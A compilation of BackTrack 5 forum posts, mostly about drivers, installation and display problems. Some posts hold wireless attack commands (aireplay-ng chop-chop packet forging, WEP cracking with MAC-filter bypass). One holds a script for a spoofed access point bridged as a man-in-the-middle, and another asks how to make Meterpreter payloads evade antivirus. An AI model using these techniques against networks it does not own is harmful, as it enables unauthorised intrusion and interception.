I tried fixing the problems by "reinstalling" my backup'd xorg.conf file but as soon as I do that, the parallels tools don't work anymore (they created a new xorg.conf file and overwrote the old one).

Is there no way to get things working fine again AND keeping the parallels tools? (All my experiments with the xorg.conf file haven't worked so far... even mashing up the Parallels created settings and the old ones doesn't seem to work).

Or do you recommend running BT5 (persistent) on a USB stick rather than as a virtual machine?

Thanks in advance for your help and for every parallels user willing to share his secret on how to run BT5 smoother ;)

I have been writing an aircrack suite script to streamline most tasks and have been extensivly testing it when I noticed a typo in aireplay-ng Chop Chop no client packet forge.
The odd thing is that it still works despite the typo, it still creates an XOR file then a packet which when injected generates 100's of iv's per second.

The typo is:

aireplay-ng -4 -h 11:11:11:11:11:11 -h 44:44:44:44:44:44 wlan1

The Mac with the 1's was the AP and the Mac with the 4's was the fake authed client which was the Mac of my interface.

The typo was in this order where the first -h should have been a -b for the AP, funnier still is that with the typo chop chop worked faster at about 1/4 the time of the correct syntax.

I have a question and I almost defo know the answer but I figure it couldnt hurt to ask so here go's:
Is it possible to install Back Track 5 on to a Samsung Tocco Lite?
The Samsung Tocco Lite is not a android phone but I am hoping there is a way!

Whenever I try and boot BT5 from my live CD, the picture is nastily squashed to the right hand side of the screen with the bottom of the picture completely off the screen. Here's a picture of what I mean. This only happens when I'm presented with the terminal or when I've run startx. The initial splash screen displays perfectly.

I tried using xrandr to make a custom resolution, but got stuck with an error explaining my monitor's max resolution is 720x576 - which it definitely isn't. I found some guides saying I need to tinker with xorg.conf - but that file doesn't even exist for me.

I'm trying to install BT5 on a partitioned hard drive; but the installer can't be resized enough for me to see all the options... I'm not comfortable with partitioning blind.

Does anyone have any suggestions? I've been Googling round for about a day now, to no avail. The graphics card is a Nvidia GeForce Go 7150M.

Hi,
i am doing some research on password lists for a security tutorial. now i am with psychology of passwords for a quite while now. What came to my attention lately is the idea to automatically create a passphrase list from a huge text file with an ebook for example. Now to be clear, lets take an example. I need a little ruby magic or shell magic which does THIS: I want to input a text file and want the script to output the list of the passphrases from within this text. When a "." appears it should include the dot in the current passphrase, do a CR and let the next passphrase begin. Example:

Text Input Textfile:
The quick brown fox jumps over the lazy dog. Always look on the bright side of life. Hello World. Blablabla. This is a test.

Now the output file must look like this:
Tqbfjotld.
Alotbsol.
HW.
B.
Tiat.

I guess that is pretty easy - but as i am not quite familiar with that stuff - please can anyone take five minutes to figure that out? Would be highly appreciated.

When this boots up, I get an error message "unknown video mode 317". I select mode 315 from the list and continue to boot up.
This is because the screen has an odd resolution of 1024x600. I had to run BackTrack 3 in 800x600 mode, but BackTrack 5 works correctly in 1024x600.

WIFI

I ran the following commands to test RFMON/injection:

killall -9 dhclient3
airmon-ng start wlan0
aireplay-ng -9 mon0

I got an "Injection is working!" confirmation.

The adapter is a mini Ralink 2860. Airmon-ng reports that it's the "rt2800pci" driver that is being used for it.

BATTERY

Battery seems to be reported correctly (also a problem on previous versions).

BOOT FROM SD

I boot from the SD card using a 4gig SDHC card. It appears to work well.

I am new to backtrack and have been setting it up over the last couple days. I am running it on a HP dv6t laptop and everything is working except for my wifi. I have tried connecting to my home network (WEP encryption) using Wicd. It appears to be working but then Wicd says "Connection failed: Unable to get IP address".

I have read some other threads and at least one other person had this same problem, but no one knew a fix. Some said it was a problem with dhclient.

I have a Alfa AWUS036H adapter and neither the Alfa or my laptops internal wifi card would connect. The Ethernet (eth0) connection works perfectly with my router and obtains an IP just fine. I have never had a problem connecting to my router with wifi in Windows.

I hope there is a simple fix for this. Please clearly explain what I need to do or if I need to provide more info because I am relatively new to Linux.

Hi, I'm fairly new to to linux, just got BT5, OSX and Windows triple boot :) However... I'm having problems installing beef, it's preinstalled in BT3 and works like a charm ... Not sure why it's not in BT5 :confused: ?

I have installed it via, APT-GET and through the software manager, however it dosn't appear under services, neither can I find out how to run it ?

let me introduce first:
Even though I always was interested into networking, security, encryption and the like, I never really got to dive too deep into those matters.
So I downloaded backtrack5 and first used it as a boot disk, shortly after that installed it on a VMWare machine.

So here is my Problem:
For starters I wanted to do something easy and decided that WEP cracking sounds fun.
I built up the following setup:
Netgear Router with WEP40 and MAC-Filter, my Netbook that is connected to this router.
I put a USB-WLAN-Stick (able to do promiscuous mode) into my desktop PC and started backtrack.

After some trial and error I really managed to find out what MAC-Address is allowed (without cheating) and crack my WEP password. Pretty simple when you get the hang of it.

So I told a friend of mine, who is more or less the same knowledge level like me and he was impressed but had a valid claim:

What, if there is no DHCP-Mode but a fixed subnet or even fixed IPs bound to a certain MAC-Address?

I decided to try the easier version first, disabled DHCP and set the subnet mask to 255.255.255.0, the router IP to 10.100.100.6 and my netbooks IP to 10.100.100.12

But here is where I don't get any further... How can I see what subnet mask is used and what IPs are present on the network from outside, only having the MAC-Addresses and the WEP key?

Im having a hard time getting my aironet 350 (AIR-CB21AG-A-K9) working with BT5. I've been searching around and trying diffrent things for the past few hours and still no go. Does anyone have any experience with getting this card to work on the BT distro? I would welcome any advice you can give me! This has been my favorite card for years, and would love to get it working.

does it mean it ain;t support injection ,so i can't capture wpa handshake?
by the way i captured a wep key before ,but the authentication often fails ,i got it once by chance and went on to capture the ivs
i have a-signal king 9 dbi antenna ,it ain't doing well so i 'm aiming to buy new one
any suggestions?
sorry for my bad english

Quote:
oot@bt:~# kmail
kmail: error while loading shared libraries: libkontactinterface.so.4: cannot open shared object file: No such file or directory
root@bt:~#
kmail doesn't open on BT5, how do I get it working?
thanks

Hi, after successfully running an injection test on my AP using aireplay-ng I went to my router (D-Link WBR-1310) to look at the logs to see if I could see the mac of the adapter. I clicked all options in the menu but found nothing. Currently using firmware version 4.13 for the router, if anyone who has the router and knows where to look could you please tell me (I can see my stations but not my wifi cards mac). Or is aireplay-ng passive?

I have Win7 Home Premium 64-Bit installed on my laptop (Asus K52F). I left enough room for a Linux installation when I installed it.

I went to go install BT5 the other day. It boots the live USB fine, installs fine. I booted from my HD, installed all updates, then ran "startx". This just brought me to a black screen, and nothing happens from here.

I'm fairly sure this is a driver issue, but I'm not sure. I also don't know how I'd go about fixing this. I'm just using the integrated Intel GMA HD Graphics, my CPU is an i3-350m. Chipset is HM55.

After downloading and burning the BT5 ISO-file (64bit with KDE), is it safe to boot from this DVD?
I mean: Does it automatically boot as only a LiveCD without proceeding an installation and without changing
something at the MBR and partitions? I really hope so...
Have to ask that because I have only one working machine at hand, and it is the productive one...;)
(That's the lack of budget, because I try collecting enough money to be able to pay for the BT online training and certification).
As far as I understand, my harddrive will remain untouched as long as I don't execute Install.sh . Correct?

If it helps to avoid flaming: I have some basic skills with Linux and Windows, and I know what an MBR is and what partitions and bootloaders are.
I just don't have any experience with the BT distro yet and I want to avoid destroying my productive machine.
Using BT inside VMware is not an alternative in my case, because as far as I know it wouldn't support the built-in WLAN-adapter of my notebook that way. Right?

OK, I'm new to using linux, I'm using Ubuntu (latest version), I'm not getting anywhere with this download:confused: OK so I downloaded bt5 direct 32 bit KDE iso.
I see it in my downloads (ubuntu). I can burn a copy to DVD, but it says it fails after download. When I use the md5sum command in the terminal, I get a file not found message. I need to know what to do. Am I downloading it wrong? getting a corrupted file or something more sinister:cool: Any help would be very appreciated thanks.

Seems to be a bug on this version with Nvidia driver. I have had too 3 times now reinstall NVIDIA to get start x to work. wheni close down, and reboot it has (but not everytime) error starting startx.
Anyone come across this and any fix known off would be great, getting annoying lol

first of all I'm new here and i wanted to say hello to all of you.
I've used BT 4 for a long time as live distro, but now with the release of BT 5 i decided to install it as my second OS with gnome desktop. After the installation, i couldn't start the x server. After searching the web for a solution, I edited the parameter GRUB_CMDLINE_LINUX_DEFAULT in the /etc/default/grub file. I removed the "nomodeset" string and updated grub. After reboot i could start the X server and my graphics were OK, but i cannot change the resolution and use the 3D effects because the proprietery drivers aren't installed. I'm using an Nvidia Geforce 7025. So I tried to install the package nvidia-current package via apt and after installation i was asked if i want to create an xorg.conf file because there was no xorg file found on the system. Allright, on BT 5 it seems that there is really no xorg.conf file in the default directory /etc/X11. So i confirmed the dialog with OK and rebooted my system. But after reboot, I am not able to start the X server one more time. Can you please help me? I grow desperate.....

I'm trying to run backtrack5 - Gnome - 64bit on an usb stick with persistence, and I am having a lot of problems. I've already had to format and reinstall at least 15 times, but always I run into problems after a while. Some of them seem to happen when I try to update. Let me be more specific. First of all, I use the tutorial posted here on running BT5 + Metasploit + PostgreSQL. It works fine, but after I restart, when backtrack boots, even before I do startx I keep getting the error

EXT2-fs loop1 deleted inode referenced

if I uninstall postgresql then this error disappears. But I don't understand what's postgresql even got to do with this error. Sometimes it reappears again later, like 3 days later. Also, what sometimes happens just out of the blue, I keep getting Input/output errors. For example, let's say in the home directory I have a file called foo.txt, I run

ls

and the output shows

Can't read foo.txt: Input/output error

This happened to me last time when I tried to update on many files, and they couldn't be updated. This then pretty much makes the system unusable. Additionally, sometimes when I restart and run startx, the window manager opens and many colors in the interface are different, the terminal doesn't have the backtrack 5 background anymore.

These are some of the problems I have. Anyone else having similar issues, or knows what I can do to fix them. I tried installing to the usb using unetbootin, universal usb installer, and linux live creator, and all of them give the same errors. I also checked my usb drive for errors, and none were found. It is also pretty new, I just got it one month ago specifically to run backtrack on it, so it should be working.

I'm new to the site, but know the power of the BT. My laptop is preloaded WIN7 one. So i need to install the BT7 with WIN7 parallely. I have a clean unpartitioned space on my hard disk to install the BT. But when im going too install it's not giving the option "guided partion on selected part on hard drive". It just show me the Guided full hard disk, to install the BT. What can be the problem. Any hint will be highly appreciated. I will post my partion table details for your preference.

Hello I am running BackTrack 5 KDE 32-bit on my ASUS P6X58D Premium and am running into problems
when attempting to install the sound drivers from the manufactures drivers CD.
Under KMix I do not have any devices listed, also in my Settings>System Settings>Multimedia to attempt
a sound test.

Feedback looks normal until the end of the installation when I receive
Code:
find /lib/modules/2.6.38/kernel/sound -name 'snd*.*o' | xargs rm -f
find /lib/modules/2.6.38/kernel/sound -name 'snd*.*o.gz' | xargs rm -f
find /lib/modules/2.6.38/kernel/sound -name 'ac97_bus.*o' | xargs rm -f
find /lib/modules/2.6.38/kernel/sound -name 'ac97_bus.*o.gz' | xargs rm -f
make[1]: Entering directory `/root/Desktop/via-linux-audiopackV1.91Beta6/alsa-driver-1.0.18a/acore'
mkdir -p /lib/modules/2.6.38/kernel/sound/acore
cp snd-hwdep.ko snd-page-alloc.ko snd-pcm.ko snd-timer.ko snd.ko /lib/modules/2.6.38/kernel/sound/acore
cp: cannot stat `snd-hwdep.ko': No such file or directory
cp: cannot stat `snd-page-alloc.ko': No such file or directory
cp: cannot stat `snd-pcm.ko': No such file or directory
cp: cannot stat `snd-timer.ko': No such file or directory
cp: cannot stat `snd.ko': No such file or directory
make[1]: *** [modules_install] Error 1
make[1]: Leaving directory `/root/Desktop/via-linux-audiopackV1.91Beta6/alsa-driver-1.0.18a/acore'
make: *** [install-modules] Error 1
Reload driver...
WARNING: Could not open '/lib/modules/2.6.38/kernel/sound/core/snd-page-alloc.ko': No such file or directory
WARNING: Could not open '/lib/modules/2.6.38/kernel/sound/core/snd.ko': No such file or directory
WARNING: Could not open '/lib/modules/2.6.38/kernel/sound/core/snd-timer.ko': No such file or directory
WARNING: Could not open '/lib/modules/2.6.38/kernel/sound/core/snd-pcm.ko': No such file or directory
WARNING: Could not open '/lib/modules/2.6.38/kernel/sound/core/snd-hwdep.ko': No such file or directory
WARNING: Could not open '/lib/modules/2.6.38/kernel/sound/pci/hda/snd-hda-codec.ko': No such file or directory
FATAL: Could not open '/lib/modules/2.6.38/kernel/sound/pci/hda/snd-hda-intel.ko': No such file or directory
WARNING: Could not open '/lib/modules/2.6.38/kernel/sound/core/snd-page-alloc.ko': No such file or directory
WARNING: Could not open '/lib/modules/2.6.38/kernel/sound/core/snd.ko': No such file or directory
WARNING: Could not open '/lib/modules/2.6.38/kernel/sound/core/snd-timer.ko': No such file or directory
WARNING: Could not open '/lib/modules/2.6.38/kernel/sound/core/snd-pcm.ko': No such file or directory
WARNING: Could not open '/lib/modules/2.6.38/kernel/sound/core/snd-hwdep.ko': No such file or directory
WARNING: Could not open '/lib/modules/2.6.38/kernel/sound/pci/hda/snd-hda-codec.ko': No such file or directory
FATAL: Could not open '/lib/modules/2.6.38/kernel/sound/pci/hda/snd-hda-intel.ko': No such file or directory
********************************************************************************
*** WARINING: Need to reboot to activate the new driver!
********************************************************************************Attachment 713

So I am trying to start a spoofed AP using airbase-ng and dhcpd3. So I can start airbase just fine but, I hit a road block when I try to get an IP. I can run dhcp. Everything works fine and dandy UNTIL I try to connect to an outside source (Like: google.com) I can assign IPs just fine but, after that it just doesn't want to work.
So this is the script I wrote to setup to setup dhcp and bridge my adatpters
Code:
#! /bin/bash
ifconfig at0 up
ifconfig eth0 up
ifconfig at0 192.168.2.1 netmask 255.255.255.0
route add -net 192.168.2.0 netmask 255.255.255.0 gw 192.168.2.1
#This command moves a conf file from my usb drive into dhcp3. This makes eit easier to edit the files on the go.
cp evil.conf /etc/dhcp3/evil.conf

#So this bridges my interfaces
brctl addbr mitm
brctl addif mitm eth0
brctl addif mitm at0
ifconfig mitm up
Next I use this to destroy all my settings so i can get internet again (Once I run that script I lose the internet until I run this script)
Code:
#! /bin/bash

Hi, In my desktop I have an ethernet card and a wireless PCI card ( D-Link DWA 552)as well. When accessing an AP is it necessary to spoof the MAC for the ethernet card (eth0)?

If the wireless card will be doing all the work, then I will only need to spoof the MAC for the wireless card, correct. So if only the wireless card is sending packets and probes it isn't necessary to mask ethernet because the AP won't be receiving any data from the ethernet card. Or is it possible the AP might receive ethernet card data somehow (when the D-Link card sends packets, maybe it sends ethernet card info too?). In which case I would have to spoof it for authentication? Or change it in case of MAC filtering?

I'm thinking I just leave it alone, and only spoof wireless card MAC..

I have some very light Linux experience over the last year, and my new job will require me to use BackTrack extensively for the foreseeable future. We are allowed to use our personal laptops when we are performing an off site testing for clients and I am looking for a replacement to my current 4+ year old clunker.

I don't have any excessive hardware requirements, nor do I have an unlimited budget (<600 estimated), but what would your recommendation be for a good laptop that doesn't have any annoying drive or chipset issues? Only other factor I am even considering is a good quality wireless chipset.

I am looking forward to using this excellent software. Thank you in advance for your thoughts and assistance.

I posted a comment in a thread recently about AV picking up custom executables created as a payload, even following encoding multiple times with one or more encoders. As far as I understand it, the AVs are picking up a signature related to how Meterpreter creates the executable, rather than the content of the payload. I know that I can create an executable that isn't picked up by AVs (such as a hex-edited version of nc.exe or one with a code cave), but can I use that as the payload which is uploaded and run on the target system when the exploit has completed? I came across the custom.rb script but that's only become available within the last couple of weeks and I'm not sure it would allow me to do what I would like.

I know that I could use such a hex-edited executable packaged with a legitimate installer and use Social Engineering to have a victim run it, but I would like to go down the route of finding some software vulnerability (such as Adobe) or an unpatched vulnerability in the Windows Operating system.

Question(s):
1. Are there any EULA issues that would preclude commercial use of BT5 on an enterprise environment, i.e. is it still free or does commercial use incur a cost?
2. Is there any documentation available or anywhere I can go to determine whether BackTrack 5 is "safe," i.e. it doesn't have any backdoors, malware, trojans, etc... I know we can confirm the ISO using the MD5 hash and I am aware that some entity's in the US gov't use various versions of BackTrack, but other than that loose association, I was hoping for something more definitive.